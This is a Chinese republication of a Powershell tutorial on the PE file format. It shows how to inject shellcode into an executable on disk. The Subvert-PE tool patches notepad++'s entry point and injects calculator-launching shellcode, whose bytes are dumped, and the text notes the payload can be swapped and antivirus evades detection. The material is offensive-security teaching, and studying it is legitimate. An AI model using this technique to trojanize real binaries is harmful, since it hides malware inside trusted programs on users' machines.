溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
這篇文章給大家分享的是有關怎么用Powershell PE注入彈你一臉計算器的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。
我們將看看以編程的方式把shellcode注入到磁盤上的PE可執行文件中,請注意我們僅僅只是在談論exe文件,PE文件格式包括許多其他擴展(dll,ocx,sys,cpl,fon,...)。手動執行此操作非常簡單,關鍵點在于需要確保PE的功能沒有改變,以免引起懷疑。但手動注入往往不實用,你需要先復制一份PE,在你自己主機上更改它,然后替換目標機器中的該文件。為了簡化這個過程,我創建了一個Subvert-PE程序,這個程序可以自動化重寫一個PE可執行文件(x86&x64)。修補入口點的偏移,注入shellcode并將執行流返回到合法代碼中。我喜歡把工具給一些有機會理解它如何工作的人使用。這篇文章比較側重于審查PE格式的相關部分,在了解PE結構后,用Powershell修改它就只是小兒科了。
此帖子可能包含Microsoft官方文檔中的信息/摘錄/圖像,這些信息在DMCA合理使用政策下提供。如果有人對此有任何問題,請給我發電子郵件。
鏈接:
[Microsoft Official PE-COFF Documentation (MSDN)]
[Portable Executable (Corkami)]
工具:
[Subvert-PE.ps1]
PE 頭
學習新知識的最好的方式是有一個具體的例子。為了在實踐中奠定基礎,我們將一步步地完成32位notepad++的PE頭。PE頭通常包括以下組件:MS-DOS頭,富簽名,PE頭,可選頭和表分區。
我不會為每個section高亮所有有意義的WORD/DWORD/QWORD,因為這是一個粗略的概述。
MS-DOS頭:
在這個例子中,DOS 頭從映像的底部(0x00)一直延伸到0x7F(127字節)。
在這里需要記住的重要東西是,在偏移位置0x3C(60字節)處,是一個提供實際PE頭偏移位置的DWORD。PE頭的偏移位置不是固定不變的,它會隨著二進制程序的變化而變化。當然,對那些感興趣的人,靜態"MZ"標識符對應于MS-DOS開發人員之一Mark Zbikowski(首字母)。
富簽名(Rich Signature):
在這里提到富簽名主要是由于好奇。盡管PE格式已經有很久的歷史(window3.1 - 1993),這一部分已經被微軟取消文檔記錄(停止支持)。簡而言之,它存儲有關PE編譯的數據。有關深入概述,可以在[NTCORE](http://www.ntcore.com/files/richsign.htm)閱讀Daniel Pistelli的分析.
PE頭:
PE頭由ASCII簽名和標準COFF文件頭組成,應該注意到在富簽名和PE頭之間存在空字節填充。對于Notepad++而言,填充的大小為0x0F(15字節),但是大小因PE而的不同而改變。
下面提供了更完整的圖片,你可以找到所有有關"機器類型(Machine Type)"和"特征(Characteristics)"的可能的值。這些都來自微軟的官方文檔。
可選標頭:
可選標頭向加載程序提供一些加載信息,這一部分僅是可選的,通常它不存在于對象文件中。可選標頭的大小是會變化的,在上方PE頭中由可選標頭大小表示。
許多部分沒有高亮,如果想要了解更完整的概述請參閱微軟官方文檔和[Corkami的分析]下方的圖片展示了所有可能的"Subsystem Type"(子系統值)字段值。
表分區:表分區緊緊地跟在可選標頭后面,這個順序是必須的,因為圖像沒有包含指向這一部分的指針,偏移位置是根據PE頭的組合大小計算的。每一個被定義的區段大小為0x28(40字節)。區段的數目可以從PE頭中獲取。
下方的圖片展示了所有可能的區段標記值,然而通常情況下只有少數幾個會經常性地出現(可讀/可執行,初始化數據,可丟棄)
上面的表只展示Notepad++PE的第一區段,其他區段(總共有4個區段),直接跟隨".text"區段。
用Powershell操作二進制文件
現在我們對PE頭格式有了初步了解,我們可以開始查看從字節到二進制文件的讀取和寫入字節。
操作數組:
我們首先該看的是16進制字節和整數之間的相互轉換。
非常有趣,但是主要目標仍然是編輯磁盤上的文件。我創建了一個簡單的4字節文件來說明如何實現。
編輯PE鏡像
是時候把理論付諸實踐了。為了解決編輯PE鏡像的問題,我們將給自己定一個簡單的目標,找到模塊入口點偏移位置,并用0xAABBCCDD重寫它。
在終端中運行此腳本,會產生以下結果。
我們看看在免疫系統(Immunity)中加載PE的時候會出現什么。
你會發現入口點并不是0xAABBCCDD 而是0xAAFBCCDD。這是意料之中的,是因為PE加載到內存的時候,入口點偏移量會被添加到鏡像庫中,而鏡像庫的偏移位置為(0x00400000)。從我們的角度來看,這并不重要,因為我們所做的任何動態計算都會自動添加到鏡像庫中。如果是rebase/ASLR,這個值可以是靜態也可以是動態。
Subvert-PE
是時候起飛了!如果我們要修改PE,通常需要以下幾個步驟:
(1)計算第一個可執行部分到空字節填充部分的偏移量;
(2)將模塊入口點替換為第一步計算的偏移量
(3)把我們的shellcode寫到那個偏移量上。
(4)將存根添加到shellcode中,該存根跳轉到合法入口點。
下的圖片描述了以上執行流程。
如上面的介紹所說,執行這些步驟并不比計算數組中的偏移量更復雜。為此,我創建了一個程序(Subvert-PE),可以動態修改PE鏡像,并且支持x86和x64。Subvert-PE函數包含shellcode,用于啟動計算器,此部分由SkyLined編寫。有關這一部分shellcode的更多細節可以在[這里]找到
讓我們來看看一個實際的例子。
```
PS C:\Users\b33f> . .\ToolKit\Subvert-PE.ps1
PS C:\Users\b33f> Get-Help Subvert-PE -Full
NAME
Subvert-PE
SYNOPSIS
Inject shellcode into a PE image while retaining the PE functionality.
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Subvert-PE -Path <String> [-Write] [<CommonParameters>]
DESCRIPTION
Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry
point. After the shellcode executes, program execution is handed back over to the legitimate PE entry
point.
PARAMETERS
-Path <String>
Path to portable executable.
Required? true
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-Write [<SwitchParameter>]
Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image
Base" and dump the memory at the null-byte location.
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
<CommonParameters>
This cmdlet supports the common parameters: Verbose, Debug,
ErrorAction, ErrorVariable, WarningAction, WarningVariable,
OutBuffer and OutVariable. For more information, type,
"get-help about_commonparameters".
INPUTS
OUTPUTS
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Subvert-PE -Path C:\Path\To\PE.exe
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Subvert-PE -Path C:\Path\To\PE.exe -Write
RELATED LINKS
[url]http://www.fuzzysecurity.com/[/url]
PS C:\Users\b33f> Subvert-PE -Path 'C:\Program Files\Notepad++\notepad++.exe' -Write
Legitimate Entry Point Offset: 0x000B7159
Preferred PE Image Base: 0x00400000
Null-Byte Padding dump:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Modified Entry Point Offset: 0x000DA6B6
Inject Far JMP: 0xe9fffdca54
Null-Byte Padding After:
31 D2 52 68 63 61 6C 63 89 E6 52 56 64 8B 72 30 8B 76 0C 8B 76
AD 8B 30 8B 7E 18 8B 5F 3C 8B 5C 1F 78 8B 74 1F 20 01 FE 8B 4C
24 01 F9 42 AD 81 3C 07 57 69 6E 45 75 F5 0F B7 54 51 FE 8B 74
1C 01 FE 03 3C 96 FF D7 E9 54 CA FD FF 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
```
下面的屏幕截圖我們可以看到notepad++正常啟動,并且同時打開了計算器!
下面的屏幕截圖展示了一些樣例注入,平臺分別為win7專業版32位和win8企業版
注意事項:
(1)在PE可執行程序中,此腳本大約有90%的成功率;但在64位系統中只有50%的成功率。這是因為在x64系統中空字節填充位非常小。一般來說你不應該使用"-Write"選項來執行腳本,
(2)顯然,shellcode可以用更有價值的代碼替換,為了避免濫用這里不做介紹。有幾件事你需要記住:由于我們需要維持執行流,所以shellcode沒有退出功能,當shellcode作為PE代碼部分的時候無法自解壓,它不可寫。在少數測試用例中,PE要求初始注冊表值正確地運行,因此,在執行之后需要恢復這些值。
(3)注入已簽名二進制文件將使簽名失效,但這只有在取證的時候需要關心。此外,因為我們在定制可執行文件中隱藏了shellcode,殺軟無法知道正在發生什么,并且會很高興地讓程序運行。我發現Comodo已經注意到了對PE的修改,它隔離了可執行文件,但仍然允許執行。我懷疑它檢測到入口點已經被篡改了。
(4)不要亂搞事,這個工具只有在授權之后才能創建使用!
感謝各位的閱讀!關于“怎么用Powershell PE注入彈你一臉計算器”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
